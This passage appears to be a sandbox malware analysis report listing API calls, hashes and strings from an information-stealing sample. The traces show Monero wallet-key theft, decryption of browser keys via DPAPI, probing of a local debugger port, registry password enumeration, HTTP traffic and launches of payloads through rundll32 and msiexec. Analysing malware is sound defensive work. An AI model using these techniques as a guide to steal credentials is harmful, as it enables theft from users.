                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              • Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                              • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                              • Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                              • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell$lstrcpy
                                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                              • API String ID: 2507796910-3625054190
                                              • Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                              • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                              • Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                              • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                              APIs
                                              • memset.MSVCRT ref: 004144EE
                                              • memset.MSVCRT ref: 00414505
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                              • lstrcatA.KERNEL32(?,02CA5298), ref: 0041455B
                                              • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                              • lstrcatA.KERNEL32(?,02CA5940), ref: 00414583
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                              • StrStrA.SHLWAPI(?,02CA5310), ref: 00414643
                                              • GlobalFree.KERNEL32(?), ref: 00414762
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                              • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                              • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                              • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                              • Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                              • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                              APIs
                                              • memset.MSVCRT ref: 04854755
                                              • memset.MSVCRT ref: 0485476C
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 048547A3
                                              • lstrcat.KERNEL32(?,006D6D0C), ref: 048547C2
                                              • lstrcat.KERNEL32(?,?), ref: 048547D6
                                              • lstrcat.KERNEL32(?,006D6FD8), ref: 048547EA
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04859187: GetFileAttributesA.KERNEL32(00000000,?,04841DFB,?,?,00425784,?,?,00420E22), ref: 04859196
                                                • Part of subcall function 0484A697: StrStrA.SHLWAPI(00000000,00421360), ref: 0484A6F0
                                                • Part of subcall function 0484A697: memcmp.MSVCRT(?,00421244,00000005), ref: 0484A749
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                                • Part of subcall function 048597B7: GlobalAlloc.KERNEL32(00000000,04854894,04854894), ref: 048597CA
                                              • StrStrA.SHLWAPI(?,006D6AD8), ref: 048548AA
                                              • GlobalFree.KERNEL32(?), ref: 048549C9
                                                • Part of subcall function 0484A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4A6
                                                • Part of subcall function 0484A477: LocalAlloc.KERNEL32(00000040,?,?,?,048451A5,00000000,?), ref: 0484A4B8
                                                • Part of subcall function 0484A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4E1
                                                • Part of subcall function 0484A477: LocalFree.KERNEL32(?,?,?,?,048451A5,00000000,?), ref: 0484A4F6
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485495A
                                              • StrCmpCA.SHLWAPI(?,004208D2), ref: 04854977
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 04854989
                                              • lstrcat.KERNEL32(00000000,?), ref: 0485499C
                                              • lstrcat.KERNEL32(00000000,00420FA0), ref: 048549AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                              • Instruction ID: 02bdabf9e528b8fa7ed906657065f3b3101882e30b38f5bcc9dc403da1b02b39
                                              • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                              • Instruction Fuzzy Hash: 9A7176B1D00218ABDB14EBA4DC89FEE7779AF88304F044A99E905E7190EB75EB44CF51
                                              APIs
                                              • memset.MSVCRT ref: 00401327
                                                • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                              • lstrlenA.KERNEL32(?), ref: 0040135C
                                              • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                              • memset.MSVCRT ref: 00401516
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                              • API String ID: 1930502592-218353709
                                              • Opcode ID: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                              • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                              • Opcode Fuzzy Hash: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                              • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                              • HeapAlloc.KERNEL32(00000000), ref: 00405021
                                              • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                              • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                              • InternetCloseHandle.WININET(+aA), ref: 00405109
                                              • InternetCloseHandle.WININET(?), ref: 00405116
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                              • String ID: +aA$+aA
                                              • API String ID: 3894370878-2425922966
                                              • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                              • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                              • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                              • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04844BCC
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 04844BF1
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04844D71
                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 0484509F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048450BB
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048450CF
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 04845100
                                              • InternetCloseHandle.WININET(00000000), ref: 04845164
                                              • InternetCloseHandle.WININET(00000000), ref: 0484517C
                                              • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 04844DCC
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • InternetCloseHandle.WININET(00000000), ref: 04845186
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID:
                                              • API String ID: 2402878923-0
                                              • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                              • Instruction ID: 9afab5a53b6a4f984645d0d6ba6c87f2df58403e46c2b308d0af72171f0df540
                                              • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                              • Instruction Fuzzy Hash: 1F121F71901218AADB59FB94DC90FEEB379AF54705F504B99A506B20A0EFB03F48CF52
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 04846598
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048465BA
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048465EC
                                              • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0484663C
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04846676
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04846688
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 048466B4
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 04846724
                                              • InternetCloseHandle.WININET(00000000), ref: 048467A6
                                              • InternetCloseHandle.WININET(00000000), ref: 048467B0
                                              • InternetCloseHandle.WININET(00000000), ref: 048467BA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID:
                                              • API String ID: 3074848878-0
                                              • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                              • Instruction ID: 7aeed581dadb4c3732590b9e24f683c88855ba6fdbca22bf3786e727a896dd2f
                                              • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                              • Instruction Fuzzy Hash: 5E715F71A0021CABEB14DFA4CC88FEDB775AF44705F108699E50ABB190EBB57A84CF41
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 04859463
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID:
                                              • API String ID: 2244384528-0
                                              • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                              • Instruction ID: 7b17da83442e838b300ff461f3d7fb40d3f0544df9f34052d625e774f4529049
                                              • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                              • Instruction Fuzzy Hash: FA71EAB5E05208EBDB04DFE4DC88FEDB7B9AB48304F108649F915E7294EB74A904CB61
                                              APIs
                                                • Part of subcall function 04849CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 04849CD1
                                              • memset.MSVCRT ref: 04849E9A
                                              • lstrcat.KERNEL32(?,004212A8), ref: 04849EAF
                                              • lstrcat.KERNEL32(?,00000000), ref: 04849EC5
                                              • memset.MSVCRT ref: 04849F01
                                              • lstrcat.KERNEL32(?,004212BC), ref: 04849F16
                                              • lstrcat.KERNEL32(?,004212C4), ref: 04849F28
                                              • lstrcat.KERNEL32(?,?), ref: 04849F3C
                                              • lstrcat.KERNEL32(?,004212C8), ref: 04849F4E
                                              • lstrcat.KERNEL32(?,?), ref: 04849F62
                                              • lstrcat.KERNEL32(?,004212CC), ref: 04849F74
                                              • lstrlen.KERNEL32(00000000), ref: 04849F7E
                                              • lstrlen.KERNEL32(00000000), ref: 04849F8D
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • memset.MSVCRT ref: 04849FE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                              • String ID:
                                              • API String ID: 689835475-0
                                              • Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                              • Instruction ID: e98ea16f2925923a40c4de9e30d90a30c75e350d887d5445ce3ec05a70565ea9
                                              • Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                              • Instruction Fuzzy Hash: FD5180B5D00218ABDB14EBE4DC89FEE7338BF54306F404A99E505E60A0EB74A644CF62
                                              APIs
                                              • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                              • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$Open$CloseHandle
                                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                              • API String ID: 3289985339-2144369209
                                              • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                              • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                              • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                              • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                              APIs
                                                • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                                • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                              • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                              • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                              • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                              • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                              • task.LIBCPMTD ref: 0040775B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
